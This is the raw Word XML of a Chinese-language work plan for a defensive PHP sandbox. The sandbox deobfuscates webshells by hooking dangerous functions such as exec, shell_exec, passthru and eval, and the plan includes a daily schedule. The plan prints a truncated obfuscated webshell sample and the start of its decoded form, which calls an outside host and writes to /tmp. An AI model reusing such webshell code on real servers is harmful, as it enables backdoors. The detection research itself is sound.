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微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b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72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>沙箱 - 工作计划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目标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通过沙箱技术, 实现代码静态反混淆, 即通过重写PHP内部函数, 还原混淆代码, 进而对webshell可疑语句进行监控, 得到较纯静态检测方式更进一步的检测结果.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手段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使用开源PHP库PHPSandbox库, 在危险函数执行之前, 将其受到的参数记录并进行检测, 判断其传入参数的危险性.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76165" cy="19907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预计目标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通过重写字符串操作函数, 以及一些危险指令执行函数, 从而将混淆后的危险代码还原, 例</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如以下代码:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/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&lt;?php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eval(gzinflate(base64_decode(str_rot13(’GIKKPhmVSslK +7 V2LJg+S3Lrv ...’))));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?&gt;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在沙箱中运行之后, 混淆的危险代码将会被还原为:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:line="400" w:lineRule="exac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&lt;?php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h5(’http :// mycompanyeye .com/list ’ ,1*900);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functionh5($u ,$t){$nobot=isset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($_REQUEST[’nobot ’])?true:false;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$debug=isset($_REQUEST[’debug ’])?true:false;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$t2 =3600*5;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$t3 =3600*12;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$tm =(! @ini_get(’upload_tmp_dir ’))?’/tmp/’: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@ini_get(’upload_tmp_dir ’);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...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?&gt;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难点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与passthru等危险函数不同的是, eval, assert这样的php关键字并没有提供较为简便的重写方法. 其重写方式还在思考中.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有些函数需要外部输入才能执行. 需要实现一种方式自动识别这类函数并提供适当的外部输入.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>计划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本次项目计划完成时间为4天, 每日的工作计划如下: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2910"/>
        <w:gridCol w:w="4568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29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5"/>
            <w:vAlign w:val="center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4568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rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minor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产出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OLE_LINK1"/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16-05-18</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent5" w:themeFillTint="66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完全熟悉PHPSandbox用法, 重写passthru函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4568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重写后的Preg_replace函数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16-05-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910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重写exec, shell_exec, phpinfo, curl_exec函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33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重写后的exec, shell_exec, phpinfo, curl_exec函数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16-05-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent5" w:themeFillTint="66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重写curl_multi_exec, create_function, pcntl_exec, popen, ssh2_exec等函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent5" w:themeFillTint="66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重写后的curl_multi_exec, create_function, pcntl_exec, popen, ssh2_exec等函数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044" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left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16-05-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910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整理所有重写函数, 提供一个php文件以及其作为沙箱的使用方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4568" w:type="dxa"/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一个PHP文件, 通过使用其中的exec方法, 将外部代码放入沙箱内执行.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imbusMonL-Regu-Extend_8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Mo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1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="200101FF" w:csb1="2028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64012847">
    <w:nsid w:val="514D2F2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="514D2F2F"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="284" w:hanging="284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425" w:hanging="283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567" w:hanging="283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63542204">
    <w:nsid w:val="573BE1BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="573BE1BC"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1364012847"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="14635422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61CE9"/>
    <w:rsid w:val="04F61CE9"/>
    <w:rsid w:val="1D426C50"/>
    <w:rsid w:val="28C659D3"/>
    <w:rsid w:val="29B5485D"/>
    <w:rsid w:val="33AF697D"/>
    <w:rsid w:val="33DC1BF6"/>
    <w:rsid w:val="394519E3"/>
    <w:rsid w:val="49EE2610"/>
    <w:rsid w:val="4E704958"/>
    <w:rsid w:val="6A936AC5"/>
    <w:rsid w:val="6ED977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Grid Table 5 Dark Accent 5"/>
    <w:basedOn w:val="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2016-05-18T02:23:00Z</dcterms:created>
  <dc:creator>Ruitao Feng</dc:creator>
  <cp:lastModifiedBy>Ruitao Feng</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-18T03:59:55Z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